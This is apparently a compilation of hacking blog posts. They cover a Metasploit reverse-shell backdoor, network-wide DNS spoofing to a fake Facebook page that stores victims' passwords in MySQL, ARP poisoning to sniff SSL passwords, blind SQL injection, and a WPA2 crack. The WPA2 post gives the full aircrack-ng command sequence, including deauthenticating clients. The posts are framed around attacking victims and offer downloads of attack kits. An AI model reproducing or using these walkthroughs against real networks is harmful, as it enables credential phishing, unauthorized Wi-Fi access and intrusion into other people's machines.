Hacking a computer in a local area network (LAN) is quite simple since we can issue direct connections among little traffic. Hacking a remote computer on a

wide area network, on the other hand, isn’t as simple as you would imagine…

Things to consider during the attack:

• Anti Virus
• Firewall
• Intrusion Detection System
• Intrusion Prevention System
• Latency
• Routers

Let’s face it: it’s a wild west out there… anything goes. All these devices will surely slow down the attack or perhaps even completely prevent it!

In order to make sure the attack endures this harsh environment we need to account for some type of encryption on our part, for this we will use vanish

(seen previously) to create a backdoor. Let’s use a reverse tcp connection to the secure http port (443) back on the attacker.

This port will need to be forwarded if it is a routed network (as most are)… you can see how to do this in the video.

Once the victim executes this backdoor he will trigger a connection back to the attacker’s machine (forwarded on the public IP address of course).

Since most routers allow connections on ports 80 and 443 using this payload should be fine.

Click here to download vanish: [ DOWNLOAD ]

Check out the video!

P.S: The settings shown are the ones that I played with and managed to get to work, if you have other payloads or parameters, etc. that were useful to you,

feel free to share in the comments sections below!

Source : http://technicdynamic.com/2012/03/hacking-a-remote-computer-using-metasploit-framework/

DNS Spoofing whole Network (Wireless)

Following the configuration of Ettercap, dnsspoof, or any other tool it’s time to think of an Attack Vector.

Most attacks give out too many flags, from a security point of view the most specialized ones are also the most worrying ones.

This time we are gonna see how to spoof the whole network’s DNS and redirect specific traffic to our own hosted server.

This server emulates a fake facebook page along with a MySQL database to store all the passwords, and displays a "we are in maintenance” message.

If you would like to try it, all you have to do is connect to MySQL (on Backtrack default password is ‘toor’):

• mysql -u root -p
• Enter password: toor
• create database facebook;
• USE facebook;
• create table content(username VARCHAR(64), password VARCHAR(64));

Start apache and run Ettercap, or arpspoof/dnsspoof, whatever you like.

Here’s the link for the fake Facebook Project: [ DOWNLOAD ]

Check the video the out!

Ettercap: DNS Spoof Configuration

So recently I’ve been trying to run the DNS Spoof plugin from ettercap and kept getting "Dissector DNS not supported” as soon as I ran the program.

After searching I found the original cause of the problem: a bug in the amd 64 bits architecture.

So the solution was simple: to use the 32 bits version for now, until they develop a working version for amd64.

On to the video, this time we are simply going to host a server, spoof the dns to redirect ALL TRAFFIC to our server…

Watch in 1080p!

This time we are owning a fully patched XP box just to show the power of Social Engineering Toolkit combined with a dns spoof technique (ettercap).

Attacker: Backtrack 5 R1 (GNOME-32)
Victim: Windows XP SP3 Fully Patched

Tools: S.E.T., Ettercap & Metasploit

Check out the teaser video and expect more on this soon

Hey guys!

I noticed a lot of newcomers have problem adapting to Backtrack Linux right away, since they don’t know basic functionality and commands. So I’ve decided to make this video as a starting point to show some of what is possible on Windows.

On this tutorial we will be using Cain & Abel to sniff SSL passwords. The user has to agree to a fake certificate in this scenario. Luckily most users almost always agree without even looking at it.

If you are familiar with Linux I recommend to use it instead since it is much more networking oriented and possesses a lot more tools (all free)

We do an ARP Poison on the network to capture all the traffic between router (default gateway) and host.

Check it out (high quality)!

Hey guys!

This time we will be taking a look at the true & false SQL injection method.

Although most programmers have already noticed this flaw and taken the right countermeasures to prevent it, due to the large amount of websites going up everyday, there are still many vulnerable pages.

This method is simple overall, however some knowledge of programming and SQL will be handy.

Basically, we want to locate a dynamic field on the website and make it return to either true or false. So if we insert a SQL statement asking the database to return a specific amount of tables and it returns false, we know the database has less tables than what we suggested.

That is the main logic behind the method!

The easiest way to identify if the return was true or false is, mostly, simple. Wherever should the dynamic content be on the website, will be missing (either blank, or upon viewing the source code of the page, one should see: "You have an error…”).

Check out the video:

It’s fair to say WPA 2 has done a lot for wireless networks.

It’s made them more secure that’s for sure. However the threat is still out there… Turns out, hacking a WPA 2 encrypted network is pretty similar to cracking a WEP encryption. Let’s see how it’s done… These are the steps:

• 1. Put wireless interface down, spoof the mac address (optional) and put wireless interface in monitor mode.
• ifconfig wlan0 down
• macchanger –mac 00:22:44:66:88:00 wlan0
• airmon-ng start wlan0

• 2. Start sniffing the target wireless network on the specific channel, write capture to file.
• airodump-ng -c 1 –bssid Network MAC Addr. -w Capture Filemon0

• 3. To capture the WPA handshake, either DeAuthenticate a connected host or wait for one to connect.
• aireplay-ng -0 0 -a Network MAC Addr. -h Your MAC Addr. -c Client MAC Addr.mon0

• 4. Now you are ready to crack using the WPA handshake and your wordlist.
• aircrack-ng –bssid Network MAC Addr. -w WordlistCapture File
  

Note: Replace the underlined content on your own execution.

For further details, check out the video in high quality: